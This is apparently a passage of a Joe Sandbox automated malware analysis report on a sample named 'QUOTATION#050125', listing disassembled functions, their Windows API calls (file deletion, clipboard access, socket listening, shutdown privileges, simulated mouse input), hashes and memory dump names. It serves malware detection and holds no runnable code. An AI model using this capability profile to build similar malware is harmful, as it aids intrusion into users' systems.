                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 3218304859-0
                                                                                      • Opcode ID: d3736f5c7416ec4c92c8cc46030760ec26485321a854dfb947a39c92195074b6
                                                                                      • Instruction ID: cd0f45c9572e17e7d7f7db2bce3539f81c6be2cbd2c99906dd394873f8886232
                                                                                      • Opcode Fuzzy Hash: d3736f5c7416ec4c92c8cc46030760ec26485321a854dfb947a39c92195074b6
                                                                                      • Instruction Fuzzy Hash: 2B023C716042009FD754DF28C895E2ABBE5EF89318F18C49DF84ACB2A2DB31ED45CB91
                                                                                      Function 00138195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00138257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00138267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00138273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00138310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0013838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 695f708c618102c9fefa003003ea0e049d855c4aec3fb4e3b2f2206d6731c6a2
                                                                                      • Instruction ID: 85d21375b86c2f073419f34e2cc51610a4901858191ae54d321f1c4cf9de86ca
                                                                                      • Opcode Fuzzy Hash: 695f708c618102c9fefa003003ea0e049d855c4aec3fb4e3b2f2206d6731c6a2
                                                                                      • Instruction Fuzzy Hash: 226169725043459FCB10EF60C841EAEB3E8FF89314F04892EF98997252DB35E949CB92
                                                                                      Function 0012D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                        • Part of subcall function 0012E199: GetFileAttributesW.KERNEL32(?,0012CF95), ref: 0012E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0012D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0012D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0012D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0012D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012D237
                                                                                        • Part of subcall function 0012D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0012D21C,?,?), ref: 0012D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0012D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: bbbf4576fffee9214574e286668c6489c97154943882b7fb827da9a0479a63bb
                                                                                      • Instruction ID: 6f7c3366f8023294738cedc79e3bf108b9ddda3f654fbfb08451f2ee71fd5cbf
                                                                                      • Opcode Fuzzy Hash: bbbf4576fffee9214574e286668c6489c97154943882b7fb827da9a0479a63bb
                                                                                      • Instruction Fuzzy Hash: 6E615C3190125D9FCF05EBA0EA92EEDB7B5AF15300F608169E40277192EB30AF19CB61
                                                                                      Function 0013ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: 4088ad22b00fe0ec347332d481df1eb305824750531a8d29ae728ec434f22122
                                                                                      • Instruction ID: 45ddf7d4db2b3db4d5dd696e289fb0e351c12449a1f439e0f4ed8fc0e9369192
                                                                                      • Opcode Fuzzy Hash: 4088ad22b00fe0ec347332d481df1eb305824750531a8d29ae728ec434f22122
                                                                                      • Instruction Fuzzy Hash: 5A416A35604711EFE710DF15D888F5ABBE5EF44329F1480A9E4198FAA2C735ED82CB90
                                                                                      Function 0012E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 001216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0012170D
                                                                                        • Part of subcall function 001216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0012173A
                                                                                        • Part of subcall function 001216C3: GetLastError.KERNEL32 ref: 0012174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0012E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 83d9d6c01d07755ec08e1bc4ca280104463bb34e2baf8417bb0ac3c54b601a94
                                                                                      • Instruction ID: a89eb6d170ddfca038460e8f77f5ec637d4abc1daa477d6aa957b370952dc7ff
                                                                                      • Opcode Fuzzy Hash: 83d9d6c01d07755ec08e1bc4ca280104463bb34e2baf8417bb0ac3c54b601a94
                                                                                      • Instruction Fuzzy Hash: 9801D672A10331AFEF5466B8BC8ABBF729CA724759F150423F902E61D1E7A05CE4C6D4
                                                                                      Function 00141204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00141276
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 001412BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 001412C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 001412F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00141303
                                                                                      • WSAGetLastError.WSOCK32 ref: 0014130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 0014133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: 0635fe02fc3b3cbfec56ee985ee150a4c2d7245d7782b03c3ca484fe120e073c
                                                                                      • Instruction ID: 328f79ed3a120bed43919b1aed8ea51e3b189a4dcc9f1ed55a3d42eb6d1d934c
                                                                                      • Opcode Fuzzy Hash: 0635fe02fc3b3cbfec56ee985ee150a4c2d7245d7782b03c3ca484fe120e073c
                                                                                      • Instruction Fuzzy Hash: 9D414E31600200AFD714DF64C485F69BBE6BF46318F288198E8569F2A6C771EDC2CBE1
                                                                                      Function 0012D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                        • Part of subcall function 0012E199: GetFileAttributesW.KERNEL32(?,0012CF95), ref: 0012E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0012D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0012D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 63d7e7eb908fdd3a144bb270cda8effda88fe93675aed27695677bec5a321a60
                                                                                      • Instruction ID: ca41c5c4da0b3f02345ba387cd78b02c9f1eee507c027a6e337c0c728e175678
                                                                                      • Opcode Fuzzy Hash: 63d7e7eb908fdd3a144bb270cda8effda88fe93675aed27695677bec5a321a60
                                                                                      • Instruction Fuzzy Hash: 41316F310083959FC204EF64E855DEF77A8AF96314F444A1DF4D153192EB30AA19CB63
                                                                                      Function 001422DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 001422E8
                                                                                        • Part of subcall function 0013E4EC: GetWindowRect.USER32(?,?), ref: 0013E504
                                                                                      • GetDesktopWindow.USER32 ref: 00142312
                                                                                      • GetWindowRect.USER32(00000000), ref: 00142319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00142355
                                                                                      • GetCursorPos.USER32(?), ref: 00142381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001423DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: 8bcbea19aaf3aa5cd6231f3c552353996514b9c512a5bc241ea563266d5c2cf2
                                                                                      • Instruction ID: 34249d109f7c249f7585bf60807f20b4b3efabb2c542f6a6f981bb03cbf00d97
                                                                                      • Opcode Fuzzy Hash: 8bcbea19aaf3aa5cd6231f3c552353996514b9c512a5bc241ea563266d5c2cf2
                                                                                      • Instruction Fuzzy Hash: B131DE72504315AFCB20DF54D849B9BBBE9FF88314F400A19F9859B191DB74EA88CBD2
                                                                                      Function 00139B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00139B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00139C8B
                                                                                        • Part of subcall function 00133874: GetInputState.USER32 ref: 001338CB
                                                                                        • Part of subcall function 00133874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00133966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00139BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00139C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1927845040-438819550
                                                                                      • Opcode ID: d8d452bc164fc491316ca2a956d7f5e1a1787628be7a92dc82682d5639fb22f9
                                                                                      • Instruction ID: 84e00c77be1a4f644101be8d447ee1ff954f64f310b71f49594754ac97c27627
                                                                                      • Opcode Fuzzy Hash: d8d452bc164fc491316ca2a956d7f5e1a1787628be7a92dc82682d5639fb22f9
                                                                                      • Instruction Fuzzy Hash: 1F41407190420A9FDF15DFA4C989EEEBBB8EF05311F244159E815A7191EB709E84CFA0
                                                                                      Function 000D997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 000D9A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 000D9B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000D9B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: 48c011ad5ecc2b97f36ea975d01babe8c9866c361953640fca2d578ea7dfac06
                                                                                      • Instruction ID: c3ab8990297ea0961d8dc42fe186d89394f93761fe7e66a009944c2a2610ac99
                                                                                      • Opcode Fuzzy Hash: 48c011ad5ecc2b97f36ea975d01babe8c9866c361953640fca2d578ea7dfac06
                                                                                      • Instruction Fuzzy Hash: E9A1F771208604FEE739AA2C8C59DBF36ADDB42350F15021BF512DABD1DB259D81D2B3
                                                                                      Function 00141806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0014185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 001418DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 001418E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 00141915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 99427753-0
                                                                                      • Opcode ID: b3b8ac8a21a4c504985d2bc7be117bcd5ae13ecacc425704f2a2659970d230e6
                                                                                      • Instruction ID: d743a702904d5f1eac80f92ddf855cca5d642b8fb4d5128690956551c9e690f7
                                                                                      • Opcode Fuzzy Hash: b3b8ac8a21a4c504985d2bc7be117bcd5ae13ecacc425704f2a2659970d230e6
                                                                                      • Instruction Fuzzy Hash: DB518275A00210AFEB10AF24C886F6E77E5AF44718F58845CF91A5F3D3D771AD828BA1
                                                                                      Function 00151C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 32c552ba3542d3dfcc7077a38b92a90fa9e15f9fb7618ce9b145a13e9e8dba38
                                                                                      • Instruction ID: 7eaf7446c71c640527b3a4b6254985b7820eff138de8e003c54c855acc3a8c2c
                                                                                      • Opcode Fuzzy Hash: 32c552ba3542d3dfcc7077a38b92a90fa9e15f9fb7618ce9b145a13e9e8dba38
                                                                                      • Instruction Fuzzy Hash: 59219131740211EFD7228F1AC884F6A7BA5AF95326B59806CEC5A8F351D772EC46CB90
                                                                                      Function 000C8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                      • API String ID: 0-1546025612
                                                                                      • Opcode ID: 0ac5fca57935855bef588b8e1e422e2c109edec0d239854d71dd5114d4a01200
                                                                                      • Instruction ID: bcb9f5da3d53189d31ad1bfc75a8ed28ccc248fb836e8312290ebb979463bdca
                                                                                      • Opcode Fuzzy Hash: 0ac5fca57935855bef588b8e1e422e2c109edec0d239854d71dd5114d4a01200
                                                                                      • Instruction Fuzzy Hash: E6A28470E0061ACBDF34CF58C944BAEB7B2BF54310F2481AAE855A7285EBB49D91CF54
                                                                                      Function 0013648E Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 367comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00136639
                                                                                      • CoCreateInstance.OLE32(0015FCF8,00000000,00000001,0015FB68,?), ref: 00136650
                                                                                      • CoUninitialize.OLE32 ref: 001368D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 948891078-24824748
                                                                                      • Opcode ID: 801bd954eea960ea59f4d5cbb0c3c454e8fa1be0778ddd3a915dce8fddca16ca
                                                                                      • Instruction ID: ce5be1620e316509957a47a630d095e63d83f84d983e290b7717e0c6659eb2b3
                                                                                      • Opcode Fuzzy Hash: 801bd954eea960ea59f4d5cbb0c3c454e8fa1be0778ddd3a915dce8fddca16ca
                                                                                      • Instruction Fuzzy Hash: 2BD12A71508301AFD314EF24C881EABB7E8EF99704F50896DF5558B292DB71E906CB92
                                                                                      Function 000FE4FF Relevance: 6.4, Strings: 4, Instructions: 1381COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
